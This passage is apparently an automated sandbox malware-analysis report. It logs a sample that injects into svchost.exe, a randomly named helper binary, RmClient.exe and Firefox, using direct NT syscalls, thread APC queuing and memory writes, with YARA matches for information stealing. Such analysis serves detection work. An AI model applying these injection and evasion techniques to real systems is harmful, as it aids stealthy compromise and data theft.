            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C4144 mov eax, dword ptr fs:[00000030h]1_2_030C4144
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03029148 mov eax, dword ptr fs:[00000030h]1_2_03029148
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03037152 mov eax, dword ptr fs:[00000030h]1_2_03037152
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C156 mov eax, dword ptr fs:[00000030h]1_2_0302C156
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03036154 mov eax, dword ptr fs:[00000030h]1_2_03036154
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302F172 mov eax, dword ptr fs:[00000030h]1_2_0302F172
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030C9179 mov eax, dword ptr fs:[00000030h]1_2_030C9179
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03070185 mov eax, dword ptr fs:[00000030h]1_2_03070185
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030EC188 mov eax, dword ptr fs:[00000030h]1_2_030EC188
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030B019F mov eax, dword ptr fs:[00000030h]1_2_030B019F
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A197 mov eax, dword ptr fs:[00000030h]1_2_0302A197
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03087190 mov eax, dword ptr fs:[00000030h]1_2_03087190
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030E11A4 mov eax, dword ptr fs:[00000030h]1_2_030E11A4
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304B1B0 mov eax, dword ptr fs:[00000030h]1_2_0304B1B0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F61C3 mov eax, dword ptr fs:[00000030h]1_2_030F61C3
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306D1D0 mov eax, dword ptr fs:[00000030h]1_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306D1D0 mov ecx, dword ptr fs:[00000030h]1_2_0306D1D0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031051CB mov eax, dword ptr fs:[00000030h]1_2_031051CB
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030551EF mov eax, dword ptr fs:[00000030h]1_2_030551EF
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030351ED mov eax, dword ptr fs:[00000030h]1_2_030351ED
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_031061E5 mov eax, dword ptr fs:[00000030h]1_2_031061E5
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030601F8 mov eax, dword ptr fs:[00000030h]1_2_030601F8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0304E016 mov eax, dword ptr fs:[00000030h]1_2_0304E016
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302A020 mov eax, dword ptr fs:[00000030h]1_2_0302A020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302C020 mov eax, dword ptr fs:[00000030h]1_2_0302C020
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F903E mov eax, dword ptr fs:[00000030h]1_2_030F903E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03032050 mov eax, dword ptr fs:[00000030h]1_2_03032050
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D705E mov ebx, dword ptr fs:[00000030h]1_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030D705E mov eax, dword ptr fs:[00000030h]1_2_030D705E
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305B052 mov eax, dword ptr fs:[00000030h]1_2_0305B052
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03105060 mov eax, dword ptr fs:[00000030h]1_2_03105060
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov ecx, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03041070 mov eax, dword ptr fs:[00000030h]1_2_03041070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305C073 mov eax, dword ptr fs:[00000030h]1_2_0305C073
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030AD070 mov ecx, dword ptr fs:[00000030h]1_2_030AD070
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0303208A mov eax, dword ptr fs:[00000030h]1_2_0303208A
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0302D08D mov eax, dword ptr fs:[00000030h]1_2_0302D08D
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03035096 mov eax, dword ptr fs:[00000030h]1_2_03035096
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D090 mov eax, dword ptr fs:[00000030h]1_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0305D090 mov eax, dword ptr fs:[00000030h]1_2_0305D090
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0306909C mov eax, dword ptr fs:[00000030h]1_2_0306909C
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov eax, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030F60B8 mov ecx, dword ptr fs:[00000030h]1_2_030F60B8
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov ecx, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0
            Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_030470C0 mov eax, dword ptr fs:[00000030h]1_2_030470C0

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtWriteVirtualMemory: Direct from: 0x76F0490C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtAllocateVirtualMemory: Direct from: 0x76F03C9C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtClose: Direct from: 0x76F02B6C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtReadVirtualMemory: Direct from: 0x76F02E8C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtCreateKey: Direct from: 0x76F02C6C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtSetInformationThread: Direct from: 0x76F02B4C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtQueryAttributesFile: Direct from: 0x76F02E6C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtAllocateVirtualMemory: Direct from: 0x76F048EC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtQuerySystemInformation: Direct from: 0x76F048CC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtQueryVolumeInformationFile: Direct from: 0x76F02F2C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtOpenSection: Direct from: 0x76F02E0C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtSetInformationThread: Direct from: 0x76EF63F9
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtDeviceIoControlFile: Direct from: 0x76F02AEC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtAllocateVirtualMemory: Direct from: 0x76F02BEC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtCreateFile: Direct from: 0x76F02FEC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtOpenFile: Direct from: 0x76F02DCC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtQueryInformationToken: Direct from: 0x76F02CAC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtTerminateThread: Direct from: 0x76F02FCC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtProtectVirtualMemory: Direct from: 0x76EF7B2E
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtOpenKeyEx: Direct from: 0x76F02B9C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtProtectVirtualMemory: Direct from: 0x76F02F9C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtSetInformationProcess: Direct from: 0x76F02C5C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtNotifyChangeKey: Direct from: 0x76F03C2C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtCreateMutant: Direct from: 0x76F035CC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtWriteVirtualMemory: Direct from: 0x76F02E3C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtMapViewOfSection: Direct from: 0x76F02D1C
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtResumeThread: Direct from: 0x76F036AC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtAllocateVirtualMemory: Direct from: 0x76F02BFC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtReadFile: Direct from: 0x76F02ADC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtQuerySystemInformation: Direct from: 0x76F02DFC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtDelayExecution: Direct from: 0x76F02DDC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtQueryInformationProcess: Direct from: 0x76F02C26
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtResumeThread: Direct from: 0x76F02FBC
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe NtCreateUserProcess: Direct from: 0x76F0371C
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe Section loaded: NULL target: C:\Windows\SysWOW64\RmClient.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe protection: read write
            Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\RmClient.exe Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\RmClient.exe Thread register set: target process: 2992
            Source: C:\Windows\SysWOW64\RmClient.exe Thread APC queued: target process: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Memory written: C:\Windows\SysWOW64\svchost.exe base: 25DF008
            Source: C:\Users\user\Desktop\w64HYOhfv1.exe Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\w64HYOhfv1.exe"
            Source: C:\Program Files (x86)\dZFrSGCtSmvRGDnWNlGUoJsvLCXjrLYrOJeYNLixYWOVqdTBjGazSYoXHNLczHMxTeNNuxmETitAdEJq\ifhdPMDeORMlb.exe Process created: C:\Windows\SysWOW64\RmClient.exe "C:\Windows\SysWOW64\RmClient.exe"
            Source: C:\Windows\SysWOW64\RmClient.exe Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Shell_TrayWnd
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
            Source: ifhdPMDeORMlb.exe, 00000003.00000000.1867459861.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000003.00000002.4129917430.0000000000FA0000.00000002.00000001.00040000.00000000.sdmp, ifhdPMDeORMlb.exe, 00000007.00000002.4130177923.0000000001210000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: }Program Manager
            Source: w64HYOhfv1.exe Binary or memory string: JDASCRWINUPRWINDOWNLWINUPLWINDOWNSHIFTUPSHIFTDOWNALTUPALTDOWNCTRLUPCTRLDOWNMOUSE_XBUTTON2MOUSE_XBUTTON1MOUSE_MBUTTONMOUSE_RBUTTONMOUSE_LBUTTONLAUNCH_APP2LAUNCH_APP1LAUNCH_MEDIALAUNCH_MAILMEDIA_PLAY_PAUSEMEDIA_STOPMEDIA_PREVMEDIA_NEXTVOLUME_UPVOLUME_DOWNVOLUME_MUTEBROWSER_HOMEBROWSER_FAVORTIESBROWSER_SEARCHBROWSER_STOPBROWSER_REFRESHBROWSER_FORWARDBROWSER_BACKNUMPADENTERSLEEPRSHIFTLSHIFTRALTLALTRCTRLLCTRLAPPSKEYNUMPADDIVNUMPADDOTNUMPADSUBNUMPADADDNUMPADMULTNUMPAD9NUMPAD8NUMPAD7NUMPAD6NUMPAD5NUMPAD4NUMPAD3NUMPAD2NUMPAD1NUMPAD0CAPSLOCKPAUSEBREAKNUMLOCKSCROLLLOCKRWINLWINPRINTSCREENUPTABSPACERIGHTPGUPPGDNLEFTINSERTINSHOMEF12F11F10F9F8F7F6F5F4F3F2F1ESCAPEESCENTERENDDOWNDELETEDELBSBACKSPACEALTONOFF0%d%dShell_TrayWndExitScript Pausedblankinfoquestionstopwarning

            Stealing of Sensitive Information

            Source: Yara match, File source: 1.2.svchost.exe.2660000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.svchost.exe.2660000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000001.00000002.1964041630.0000000002ED0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.1963743549.0000000002660000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
